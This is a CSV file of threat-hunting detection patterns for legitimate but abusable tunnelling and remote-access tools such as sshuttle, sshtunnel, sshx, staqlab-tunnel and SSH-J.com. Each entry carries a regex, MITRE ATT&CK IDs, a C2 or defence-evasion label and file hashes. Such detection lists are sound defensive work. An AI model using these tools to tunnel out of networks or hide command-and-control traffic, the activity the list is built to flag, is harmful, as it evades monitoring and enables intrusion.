"*ssh *@ssh-j.com*",".{0,1000}ssh\s.{0,1000}\@ssh\-j\.com.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sshjmpnoutfqotbj6r3acexiwoalgkth55y5kys7js3px2qqqrwuhqqd.onion*",".{0,1000}sshjmpnoutfqotbj6r3acexiwoalgkth55y5kys7js3px2qqqrwuhqqd\.onion.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ValdikSS/dropbear-sshj*",".{0,1000}ValdikSS\/dropbear\-sshj.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* install -c conda-forge sshtunnel*",".{0,1000}\sinstall\s\-c\sconda\-forge\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"* -m sshtunnel *",".{0,1000}\s\-m\ssshtunnel\s.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"* sshtunnel.py*",".{0,1000}\ssshtunnel\.py.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"* SSHTunnelForwarder(*",".{0,1000}\sSSHTunnelForwarder\(.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*/sshtunnel -*",".{0,1000}\/sshtunnel\s\-.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*/sshtunnel.git*",".{0,1000}\/sshtunnel\.git.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*/sshtunnel.py*",".{0,1000}\/sshtunnel\.py.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*/sshtunnel/tarball/*",".{0,1000}\/sshtunnel\/tarball\/.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*/sshtunnel/zipball/*",".{0,1000}\/sshtunnel\/zipball\/.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*\sshtunnel.py*",".{0,1000}\\sshtunnel\.py.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*c89b4490de04897b1c16e5dae1c10ef10e60c56294bd4ca45d1669f5dcb6f9e3*",".{0,1000}c89b4490de04897b1c16e5dae1c10ef10e60c56294bd4ca45d1669f5dcb6f9e3.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","#filehash","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*Creating SSHTunnelForwarder*paramiko*",".{0,1000}Creating\sSSHTunnelForwarder.{0,1000}paramiko.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*easy_install sshtunnel*",".{0,1000}easy_install\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*from sshtunnel import *",".{0,1000}from\ssshtunnel\simport\s.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*from sshtunnel import SSHTunnelForwarder*",".{0,1000}from\ssshtunnel\simport\sSSHTunnelForwarder.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*import sshtunnel*",".{0,1000}import\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*pahaz/sshtunnel*",".{0,1000}pahaz\/sshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*pip install sshtunnel*",".{0,1000}pip\sinstall\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*sshtunnel.readthedocs.io*",".{0,1000}sshtunnel\.readthedocs\.io.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"*sshtunnel.readthedocs.org*",".{0,1000}sshtunnel\.readthedocs\.org.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z"
"* install sshuttle*",".{0,1000}\sinstall\ssshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"* py39-sshuttle*",".{0,1000}\spy39\-sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"* sshuttle:sshuttle *",".{0,1000}\ssshuttle\:sshuttle\s.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*/etc/sshuttle*",".{0,1000}\/etc\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*/home/sshuttle*",".{0,1000}\/home\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*/sshuttle.git*",".{0,1000}\/sshuttle\.git.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*/sshuttle.py*",".{0,1000}\/sshuttle\.py.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*/sshuttle/tarball*",".{0,1000}\/sshuttle\/tarball.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*/sshuttle/zipball*",".{0,1000}\/sshuttle\/zipball.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*/tmp/sshuttle*",".{0,1000}\/tmp\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*b86e9468c1470e3a3e776f5cab91a1cb79927743cfbc92535e753024611e8b4e*",".{0,1000}b86e9468c1470e3a3e776f5cab91a1cb79927743cfbc92535e753024611e8b4e.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","#filehash","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*net-proxy/sshuttle*",".{0,1000}net\-proxy\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle -*",".{0,1000}sshuttle\s\-.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle.cmdline*",".{0,1000}sshuttle\.cmdline.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle.firewall*",".{0,1000}sshuttle\.firewall.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle.linux*",".{0,1000}sshuttle\.linux.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle.methods.socket*",".{0,1000}sshuttle\.methods\.socket.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle.server*",".{0,1000}sshuttle\.server.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle.service*",".{0,1000}sshuttle\.service.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle.ssh*",".{0,1000}sshuttle\.ssh.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sshuttle/sshuttle*",".{0,1000}sshuttle\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","1","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*SSHUTTLE0001*",".{0,1000}SSHUTTLE0001.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*sudoers.d/sshuttle_auto*",".{0,1000}sudoers\.d\/sshuttle_auto.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"*systemctl start sshuttle*",".{0,1000}systemctl\sstart\ssshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","N/A","N/A","10","10","11531","725","2024-08-20T06:32:54Z","2014-09-15T04:51:13Z"
"* --bin sshx-server*",".{0,1000}\s\-\-bin\ssshx\-server.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"* s3://sshx/*",".{0,1000}\ss3\:\/\/sshx\/.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*.vm.sshx.internal:8051*",".{0,1000}\.vm\.sshx\.internal\:8051.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*/release/sshx-server*",".{0,1000}\/release\/sshx\-server.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*/sshx-server/*",".{0,1000}\/sshx\-server\/.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*\sshx-*.tar.gz*",".{0,1000}\\sshx\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*cargo install sshx*",".{0,1000}cargo\sinstall\ssshx.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*ekzhang/sshx*",".{0,1000}ekzhang\/sshx.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*https://s3.amazonaws.com/sshx/sshx-*",".{0,1000}https\:\/\/s3\.amazonaws\.com\/sshx\/sshx\-.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*https://sshx.io/get*",".{0,1000}https\:\/\/sshx\.io\/get.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*https://sshx.io/s/*",".{0,1000}https\:\/\/sshx\.io\/s\/.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*sshx-server --listen*",".{0,1000}sshx\-server\s\-\-listen.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","0","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*sshx-server-*.tar.gz*",".{0,1000}sshx\-server\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","sshx","Fast collaborative live terminal sharing over the web","T1021.004 - T1041 - T1059 - T1071.001","TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/ekzhang/sshx","1","1","N/A","N/A","10","10","5703","166","2024-05-05T02:37:49Z","2022-02-12T23:29:33Z"
"*http*.sslip.io*",".{0,1000}http.{0,1000}\.sslip\.io.{0,1000}","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","N/A","letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic","6","10","594","75","2024-08-30T00:09:57Z","2015-08-26T18:43:35Z"
"*./staqlab-tunnel *",".{0,1000}\.\/staqlab\-tunnel\s.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*/bin/staqlab-tunnel*",".{0,1000}\/bin\/staqlab\-tunnel.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*6510fdf42becdab665232ef6393e40a559dd2b3b2b7927333c9f30a62bf7de3f*",".{0,1000}6510fdf42becdab665232ef6393e40a559dd2b3b2b7927333c9f30a62bf7de3f.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#filehash","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*7ec426ac53bac81654965fa1b8ff8af3451b7524f648d4b11ea7d3437a5ba907*",".{0,1000}7ec426ac53bac81654965fa1b8ff8af3451b7524f648d4b11ea7d3437a5ba907.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#filehash","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*d0d66c649a64735a67735370f0790418b48abeccaa0506fa66f00a967e8c3b73*",".{0,1000}d0d66c649a64735a67735370f0790418b48abeccaa0506fa66f00a967e8c3b73.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","#filehash","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*staqlab-tunnel port=*",".{0,1000}staqlab\-tunnel\sport\=.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","0","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*staqlab-tunnel.exe*",".{0,1000}staqlab\-tunnel\.exe.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*staqlab-tunnel.zip*",".{0,1000}staqlab\-tunnel\.zip.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*tunnel.staqlab.com*",".{0,1000}tunnel\.staqlab\.com.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*tunnel-api.staqlab.com*",".{0,1000}tunnel\-api\.staqlab\.com.{0,1000}","greyware_tool_keyword","staqlab-tunnel","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/cocoflan/Staqlab-tunnel","1","1","N/A","N/A","10","10","1","0","2020-05-19T06:43:14Z","2020-05-19T06:19:31Z"
"*/linux_x64_admin*",".{0,1000}\/linux_x64_admin.{0,1000}","greyware_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2631","399","2024-08-28T14:23:17Z","2019-11-15T03:25:50Z"
